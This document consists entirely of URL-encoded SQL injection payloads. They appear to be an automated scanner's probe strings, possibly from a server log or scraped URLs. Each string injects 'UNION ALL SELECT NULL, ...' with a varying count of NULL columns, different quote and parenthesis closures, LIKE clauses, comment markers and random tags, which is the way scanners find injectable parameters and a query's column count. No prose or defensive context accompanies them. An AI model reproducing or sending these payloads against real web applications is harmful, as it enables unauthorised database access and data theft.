1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27voZx%27%3D%27voZx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27fhXT%27%3D%27fhXT 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27PrST%27%3D%27PrST 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27EYqr%27%3D%27EYqr 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27UAnV%27%3D%27UAnV 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27GEFp%27%3D%27GEFp 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27aQPm%27%3D%27aQPm 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27GMQP%27%3D%27GMQP 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27fhtO%27%3D%27fhtO 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27aRdC%27%3D%27aRdC 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27XbjJ%27%3D%27XbjJ 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27GVOM%27%3D%27GVOM 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27YSsZ%27%3D%27YSsZ 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27YxMC%27%3D%27YxMC 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27lPbS%27%3D%27lPbS 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27NuQl%27%3D%27NuQl 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27buYF%27%3D%27buYF 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27lEii%27%3D%27lEii 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27cbdK%27%3D%27cbdK 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27buuA%27%3D%27buuA 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27FziL%27%3D%27FziL 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27fJcK%27%3D%27fJcK 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27xzlg%27%3D%27xzlg 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27vEng%27%3D%27vEng 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27vKSX%27%3D%27vKSX 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27RYnr%27%3D%27RYnr 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27fQyA%27%3D%27fQyA 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Bdwx%27%20LIKE%20%27Bdwx 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27YdEV%27%20LIKE%20%27YdEV 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27FNrW%27%20LIKE%20%27FNrW 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27ivdK%27%20LIKE%20%27ivdK 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27lTMT%27%20LIKE%20%27lTMT 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27uFEl%27%20LIKE%20%27uFEl 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27PdAy%27%20LIKE%20%27PdAy 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Ppre%27%20LIKE%20%27Ppre 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27gfWr%27%20LIKE%20%27gfWr 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27yDTD%27%20LIKE%20%27yDTD 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27mqob%27%20LIKE%20%27mqob 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27zTak%27%20LIKE%20%27zTak 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27RTbT%27%20LIKE%20%27RTbT 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27DrBt%27%20LIKE%20%27DrBt 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27zvCY%27%20LIKE%20%27zvCY 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27CMAq%27%20LIKE%20%27CMAq 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27iErL%27%20LIKE%20%27iErL 